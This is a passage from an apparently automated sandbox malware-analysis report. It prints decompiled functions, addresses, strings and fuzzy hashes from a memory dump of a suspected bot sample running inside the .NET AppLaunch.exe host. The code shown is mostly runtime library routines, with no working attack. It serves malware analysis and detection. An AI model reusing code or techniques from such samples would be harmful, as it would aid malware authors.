					_t66 = 0x16;
					 *_t45 = _t66;
					E0042928F();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x00431131
0x0043113a
0x0043113f
0x00431149
0x0043114c
0x00431169
0x0043116a
0x0043117d
0x00431182
0x0043118a
0x00431190
0x00431193
0x00431195
0x0043119c
0x0043119c
0x0043119e
0x004311a1
0x004311a4
0x004311ab
0x004311c4
0x004311c9
0x004311cb
0x004311ec
0x004311f4
0x004311f7
0x00431212
0x00431215
0x0043121c
0x00431220
0x00431222
0x00431229
0x0043122c
0x0043122e
0x00431230
0x00431232
0x0043123c
0x0043123c
0x0043123e
0x00431244
0x00431247
0x00431249
0x0043124f
0x00431250
0x00431256
0x00431259
0x0043125a
0x00431260
0x00431263
0x00000000
0x00000000
0x00000000
0x00000000
0x00431234
0x00431234
0x00431234
0x00431237
0x00431238
0x00431238
0x00000000
0x00431234
0x00431224
0x00000000
0x00431224
0x004311fc
0x004311fc
0x004311fd
0x00431202
0x00431204
0x00431206
0x0043120b
0x0043120b
0x00000000
0x0043120b
0x004311cd
0x004311d2
0x004311d4
0x004311d5
0x00000000
0x004311d5
0x00431197
0x0043119a
0x00000000
0x00000000
0x00000000
0x0043119a
0x0043114e
0x00431151
0x00000000
0x00000000
0x00431153
0x0043115a
0x0043115b
0x0043115d
0x00431162
0x00000000
0x00431162
0x00000000

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 00431174, 0043117B, 004311B1

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID:
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
API String ID: 0-448403072
Opcode ID: db670e0b0bdcd1810a32c218492280db4a7f53d5d74fedc2bb7a294b46368e94
Instruction ID: c587e857e0bb18bc6c5dda4daaa645e955d40d69d0c7f86851d121cc1147f071
Opcode Fuzzy Hash: db670e0b0bdcd1810a32c218492280db4a7f53d5d74fedc2bb7a294b46368e94
Instruction Fuzzy Hash: 8A418671A04218ABDB11DF9ADC81DAFBBB8EB8D310F1410ABE500E7360D6B85E41DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00434FC1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00434FC1(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, char _a8) {
				signed int _v8;
				char _v16;
				char _v20;
				void* __edi;
				signed int _t23;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				signed int _t39;
				signed int _t43;
				void* _t48;
				void* _t68;
				void* _t71;
				signed int _t76;

				_t70 = __esi;
				_t68 = __edx;
				_t47 = __ebx;
				_t23 =  *0x4c61a4; // 0x8656a166
				_v8 = _t23 ^ _t76;
				_t2 =  &_a8; // 0x32e8ec4d
				_t69 =  *_t2;
				if(( *( *_t2 + 0xc) >> 0x0000000c & 0x00000001) == 0) {
					_push(__ebx);
					_push(__esi);
					_t27 = E004334AF(_t69);
					_t48 = 0x4c63d8;
					if(_t27 == 0xffffffff || E004334AF(_t69) == 0xfffffffe) {
						_t28 = _t48;
					} else {
						_t43 = E004334AF(_t69);
						_t28 =  *((intOrPtr*)(0x4c7560 + (_t43 >> 6) * 4)) + (E004334AF(_t69) & 0x0000003f) * 0x38;
					}
					_t9 = _t28 + 0x29; // 0xa0a0a00
					_t29 =  *_t9;
					if(_t29 == 2 || _t29 == 1) {
						L18:
						_t30 = E00434F91(_a4, _t69);
					} else {
						if(E004334AF(_t69) != 0xffffffff && E004334AF(_t69) != 0xfffffffe) {
							_t39 = E004334AF(_t69);
							_t48 =  *((intOrPtr*)(0x4c7560 + (_t39 >> 6) * 4)) + (E004334AF(_t69) & 0x0000003f) * 0x38;
						}
						if( *((char*)(_t48 + 0x28)) >= 0) {
							goto L18;
						} else {
							_t14 =  &_v16; // 0x32e8ec4d
							if(E00434193( &_v20, _t14, 5, _a4) != 0) {
								L17:
								_t30 = 0xffff;
							} else {
								_t71 = 0;
								if(_v20 <= 0) {
									L16:
									_t30 = _a4;
								} else {
									while(1) {
										_t18 = _t71 - 0xc; // 0x32e8ec4d
										if(E004350EA( *((char*)(_t76 + _t18)), _t69) == 0xffffffff) {
											goto L17;
										}
										_t71 = _t71 + 1;
										if(_t71 < _v20) {
											continue;
										} else {
											goto L16;
										}
										goto L19;
									}
									goto L17;
								}
							}
						}
					}
					L19:
					_pop(_t70);
					_pop(_t47);
				} else {
					_t30 = E00434F91(_a4, _t69);
				}
				return E00424900(_t30, _t47, _v8 ^ _t76, _t68, _t69, _t70);
			}

0x00434fc1
0x00434fc1
0x00434fc1
0x00434fc9
0x00434fd0
0x00434fd4
0x00434fd4
0x00434fe0
0x00434ff2
0x00434ff3
0x00434ff5
0x00434ffa
0x00435003
0x00435035
0x00435011
0x00435012
0x00435031
0x00435031
0x00435037
0x00435037
0x0043503c
0x004350d0
0x004350d4
0x0043504a
0x00435054
0x00435063
0x00435082
0x00435082
0x00435088
0x00000000
0x0043508a
0x0043508d
0x004350a1
0x004350c9
0x004350c9
0x004350a3
0x004350a3
0x004350a8
0x004350c3
0x004350c3
0x004350aa
0x004350aa
0x004350aa
0x004350bb
0x00000000
0x00000000
0x004350bd
0x004350c1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004350c1
0x00000000
0x004350aa
0x004350a8
0x004350a1
0x00435088
0x004350db
0x004350db
0x004350dc
0x00434fe2
0x00434fe6
0x00434fec
0x004350e9

APIs

__cftof.LIBCMT ref: 00435097

Strings

M2, xrefs: 00434FD4, 00434FE2, 00434FF4, 00435005, 00435011, 00435019, 0043504A, 00435056, 00435062, 0043506A, 004350AF, 004350D0
M2, xrefs: 0043508D, 004350AA, 00435092, 004350B0

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: __cftof
String ID: M2$M2
API String ID: 1622813385-288891614
Opcode ID: 0d9e9751deacba5675265cfe8c4d0699518e6c32f7da1a41e67ed8f45e1ed7e1
Instruction ID: d8cfaa3078a57078c281741ee8a165b7459c699c6d8969ccfc2e36a53fcc4cd6
Opcode Fuzzy Hash: 0d9e9751deacba5675265cfe8c4d0699518e6c32f7da1a41e67ed8f45e1ed7e1
Instruction Fuzzy Hash: 99315A324046146AC71D6B359C46D7F73B88E8E738F24232FF4109A2D1EA2ED8438698

Uniqueness

Uniqueness Score: -1.00%

Function 004284AF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E004284AF(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E00427DC5(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00427DC5(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00427645(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00427578(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E0042808A(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E0042972B(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x004284af
0x004284af
0x004284b6
0x004284bf
0x004285de
0x004284c5
0x004284c5
0x004284c6
0x004284c7
0x004284d1
0x004284d4
0x004284da
0x004284e4
0x00428509
0x0042850e
0x00428513
0x004285da
0x00000000
0x004285db
0x00428513
0x004284e4
0x00428519
0x0042851c
0x0042851f
0x00428525
0x0042852b
0x0042853d
0x00428542
0x00428545
0x00428548
0x0042854b
0x0042854e
0x00428554
0x0042855a
0x0042855d
0x00428560
0x0042856f
0x00428570
0x00428570
0x00428575
0x00428588
0x0042858a
0x0042858f
0x0042859a
0x0042859c
0x0042859e
0x004285ba
0x004285bf
0x004285c2
0x004285c2
0x0042859a
0x0042858f
0x004285c8
0x004285c9
0x004285cc
0x004285cf
0x004285d2
0x004285d5
0x00428560
0x00000000
0x00428554
0x004285df
0x004285e4
0x004285e8
0x004285eb
0x004285ec
0x004285ed
0x004285ee
0x004285f3
0x0042866b
0x0042866d
0x004285f5
0x004285f5
0x004285fb
0x00000000
0x004285fd
0x00428600
0x00428603
0x0042860a
0x0042860d
0x00428611
0x00428643
0x00428646
0x0042864d
0x00428653
0x0042865d
0x00428666
0x00428666
0x0042865d
0x00428653
0x00428667
0x00428613
0x00428613
0x00428613
0x00428616
0x00428616
0x0042861a
0x00000000
0x00000000
0x0042861e
0x00428632
0x00428632
0x00428620
0x00428620
0x00428626
0x00000000
0x00428628
0x00428628
0x0042862b
0x00428630
0x00000000
0x00000000
0x00000000
0x00000000
0x00428630
0x00428626
0x0042863b
0x0042863d
0x00000000
0x0042863f
0x0042863f
0x0042863f
0x00000000
0x0042863d
0x00428636
0x00428638
0x00000000
0x00428638
0x00000000
0x00000000
0x00000000
0x00428603
0x004285fb
0x0042866e
0x00428672
0x00428672

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004284D4

Strings

MOC, xrefs: 004284E6
RCC, xrefs: 004284EE

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 07bc7faaab389fcfd66b8e8b11bb50410760b5f95cb0c6ce570eeb78b9982cee
Instruction ID: 4941cd605b8ef3d7fecdec2a8557f0b48a678fb771bea79ed30d72e1377554b0
Opcode Fuzzy Hash: 07bc7faaab389fcfd66b8e8b11bb50410760b5f95cb0c6ce570eeb78b9982cee
Instruction Fuzzy Hash: 21415B71A00129AFCF15DF98D881AAEBBB5FF48304F54805EF904A7251DB399990DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A560 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A560(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				void* _t61;
				void* _t81;

				_v12 = __ecx;
				_v8 = _v12;
				_v16 =  *((intOrPtr*)(_v8 + 0x10));
				_t61 = E00421040(_v12, __eflags);
				_t126 = _t61 - _v16 - _a4;
				if(_t61 - _v16 < _a4) {
					E0041A4E0();
				}
				_v24 = _v16 + _a4;
				_v32 =  *((intOrPtr*)(_v8 + 0x14));
				_v28 = E004186C0(_v12, _v24);
				_v40 = E00419380(_v12);
				_v20 = E0041A610(_v40, _t126, _v28 + 1);
				E00416AC0(_t68, _v8);
				 *((intOrPtr*)(_v8 + 0x10)) = _v24;
				 *((intOrPtr*)(_v8 + 0x14)) = _v28;
				_v44 = E004075F0(_v20);
				if(_v32 < 0x10) {
					_t55 =  &_v44; // 0x42234d
					E00417C50( &_a8,  *_t55, _v8, _v16, _a12, _a16, _a20, _a24);
					E00407400(_v8, _v8,  &_v20);
				} else {
					_v36 =  *_v8;
					_t81 = E004075F0(_v36);
					_t42 =  &_v44; // 0x42234d
					E00417C50( &_a8,  *_t42, _t81, _v16, _a12, _a16, _a20, _a24);
					E0041C9D0(_v40, _v36, _v32 + 1);
					 *_v8 = _v20;
				}
				return _v12;
			}

0x0040a566
0x0040a56c
0x0040a575
0x0040a57b
0x0040a583
0x0040a586
0x0040a588
0x0040a588
0x0040a593
0x0040a59c
0x0040a5ab
0x0040a5b6
0x0040a5c8
0x0040a5ce
0x0040a5d9
0x0040a5e2
0x0040a5f1
0x0040a5f8
0x0040a664
0x0040a66b
0x0040a678
0x0040a5fa
0x0040a5ff
0x0040a61a
0x0040a623
0x0040a62a
0x0040a63d
0x0040a648
0x0040a648
0x0040a686

APIs

Part of subcall function 00421040: _Max_value.LIBCPMTD ref: 0042106C
Part of subcall function 00421040: _Min_value.LIBCPMTD ref: 00421092

allocator.LIBCONCRTD ref: 0040A5C3
allocator.LIBCONCRTD ref: 0040A63D

Strings

M#B, xrefs: 0040A664, 0040A623, 0040A626, 0040A667

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: allocator$Max_valueMin_value
String ID: M#B
API String ID: 1981992285-2709033052
Opcode ID: 9a00f95357f193930b7e8583ef73c27c18ae415725f8deb57becea33471ffdb7
Instruction ID: 9f81ecd8880a853c8fb0aa648bd5b230b017203b72fb12e007f2793a2dc1b9e0
Opcode Fuzzy Hash: 9a00f95357f193930b7e8583ef73c27c18ae415725f8deb57becea33471ffdb7
Instruction Fuzzy Hash: 8E41F3B5E00109AFCB08DF99C9818EEB7B9BF88304B208559E519A3341D734AE41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041D0CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Mutex_base::~_Mutex_base.LIBCONCRTD ref: 0041D15F
std::_Mutex_base::~_Mutex_base.LIBCONCRTD ref: 0041D1A8
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0041D209
std::_Mutex_base::~_Mutex_base.LIBCONCRTD ref: 0041D307
std::_Mutex_base::~_Mutex_base.LIBCONCRTD ref: 0041D350

Strings

": , xrefs: 0041D188

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Mutex_baseMutex_base::~_std::_$Affinity::operator!=Concurrency::details::Hardware
String ID: ":
API String ID: 4144466773-3662656813
Opcode ID: b30c301fadbc45359027e58be9b371d0d9a994df2f75c3fdd34e3804211e5db1
Instruction ID: 3d9702ff3ffae4fbe0d63c896a7d183fa656e615fff9cd24ae4399cc852127c6
Opcode Fuzzy Hash: b30c301fadbc45359027e58be9b371d0d9a994df2f75c3fdd34e3804211e5db1
Instruction Fuzzy Hash: 9B31AA74A40118DFCB18DF95CD91AEEBBB1BF88305F144199E506A73A1DB346E91CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00435163 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00435163(void* __eflags, intOrPtr* _a4) {
				void* _t14;
				void* _t15;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t31;
				intOrPtr* _t32;

				_t32 = _a4;
				if(E00435128(__eflags, _t32) == 0) {
					L11:
					__eflags = 0;
					return 0;
				}
				_t14 = E0043359E(1);
				_t23 = 2;
				if(_t32 != _t14) {
					_t15 = E0043359E(_t23);
					__eflags = _t32 - _t15;
					if(_t32 != _t15) {
						goto L11;
					}
					_t31 = 0x4c755c;
					L5:
					 *0x4c7548 =  *0x4c7548 + 1;
					if(( *(_t32 + 0xc) & 0x000004c0) != 0) {
						goto L11;
					}
					asm("lock or [ecx], eax");
					_t18 =  *_t31;
					if(_t18 != 0) {
						L10:
						 *((intOrPtr*)(_t32 + 4)) = _t18;
						 *_t32 =  *_t31;
						 *((intOrPtr*)(_t32 + 8)) = 0x1000;
						 *((intOrPtr*)(_t32 + 0x18)) = 0x1000;
						L9:
						return 1;
					}
					 *_t31 = E00432552(0x1000);
					E00432BD6(0);
					_t18 =  *_t31;
					if(_t18 != 0) {
						goto L10;
					}
					_t30 = _t32 + 0x14;
					 *((intOrPtr*)(_t32 + 8)) = _t23;
					 *((intOrPtr*)(_t32 + 4)) = _t30;
					 *_t32 = _t30;
					 *((intOrPtr*)(_t32 + 0x18)) = _t23;
					goto L9;
				}
				_t31 = 0x4c7558;
				goto L5;
			}

0x0043516a
0x00435177
0x00435208
0x00435208
0x00000000
0x00435208
0x0043517f
0x00435187
0x0043518a
0x00435194
0x0043519a
0x0043519c
0x00000000
0x00000000
0x0043519e
0x004351a3
0x004351a3
0x004351b4
0x00000000
0x00000000
0x004351bb
0x004351be
0x004351c2
0x004351f1
0x004351f1
0x004351f6
0x004351f8
0x004351ff
0x004351ed
0x00000000
0x004351ed
0x004351d0
0x004351d2
0x004351d7
0x004351dd
0x00000000
0x00000000
0x004351df
0x004351e2
0x004351e5
0x004351e8
0x004351ea
0x00000000
0x004351ea
0x0043518c
0x00000000

APIs

_free.LIBCMT ref: 004351D2

Strings

\uL, xrefs: 0043519E
XuL, xrefs: 0043518C

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free
String ID: XuL$\uL
API String ID: 269201875-745422369
Opcode ID: 52432c42e61f6229861eeadb778d90aaea51cbc5fc406541b66777ccb1409a5f
Instruction ID: ebaeac264caad9a70ef496f5d43bfb3afa00a6717e15821d5ec953ac99937d02
Opcode Fuzzy Hash: 52432c42e61f6229861eeadb778d90aaea51cbc5fc406541b66777ccb1409a5f
Instruction Fuzzy Hash: AE110431545B029FDB609F1AD481B53B7E4EB1D3A8F20602FE499C7381D778A9818B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C5E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				signed char _t29;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				E00404770( &_v32, E0041A590( &_v5, 1),  &_v12);
				_v16 = E004075F0(_a4);
				_v20 = E0041A400( &_v32);
				E0040BFB0(__eflags,  &_v5, _v20, _v16);
				_t29 = E00406080( &_v32,  &_v32, 0);
				_t46 = _t29 & 0x000000ff;
				_t56 = _t29 & 0x000000ff;
				if((_t29 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t46, __edi, __esi, _t56, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_v24 = E00419BE0( &_v32);
				E00416B60( &_v32);
				return _v24;
			}

0x0040c5e9
0x0040c5f5
0x0040c610
0x0040c621
0x0040c62c
0x0040c63b
0x0040c649
0x0040c651
0x0040c654
0x0040c656
0x0040c658
0x0040c667
0x0040c66c
0x0040c677
0x0040c67d
0x0040c688

APIs

Part of subcall function 0041A590: _Allocate.LIBCONCRTD ref: 0041A5A0

operator!=.LIBCPMTD ref: 0040C649

Strings

obj != nullptr, xrefs: 0040C662
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040C65D

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$obj != nullptr
API String ID: 1702145254-3474634137
Opcode ID: e673002d4fed4f6aac1b0690a105af9a063421f1c5cdab1f9d729372374ba598
Instruction ID: f8169c8b502913c188f589e31fccb68629f754ab885e43a9570150e812f9f2e8
Opcode Fuzzy Hash: e673002d4fed4f6aac1b0690a105af9a063421f1c5cdab1f9d729372374ba598
Instruction Fuzzy Hash: A01160B5D04209AACB04EBE1EC52EEFB378AB54304F00456AE50566182FB796609CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C740(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				signed char _t29;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				E00404770( &_v32, E0041A590( &_v5, 1),  &_v12);
				_v16 = E004075F0(_a4);
				_v20 = E0041A400( &_v32);
				E0040C040( &_v5, _v20, _v16);
				_t29 = E00406080( &_v32,  &_v32, 0);
				_t46 = _t29 & 0x000000ff;
				_t55 = _t29 & 0x000000ff;
				if((_t29 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t46, __edi, __esi, _t55, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_v24 = E00419BE0( &_v32);
				E00416B60( &_v32);
				return _v24;
			}

0x0040c749
0x0040c755
0x0040c770
0x0040c781
0x0040c78c
0x0040c79b
0x0040c7a9
0x0040c7b1
0x0040c7b4
0x0040c7b6
0x0040c7b8
0x0040c7c7
0x0040c7cc
0x0040c7d7
0x0040c7dd
0x0040c7e8

APIs

Part of subcall function 0041A590: _Allocate.LIBCONCRTD ref: 0041A5A0

operator!=.LIBCPMTD ref: 0040C7A9

Strings

obj != nullptr, xrefs: 0040C7C2
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040C7BD

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$obj != nullptr
API String ID: 1702145254-3474634137
Opcode ID: dce0871265d88577453e73d59efbf281f77ae7eb014534d9a926f300e1176512
Instruction ID: beedd45695e81219656e4f84c421aa8b5ed36a5cac89fab11fe05c1ad5d518c2
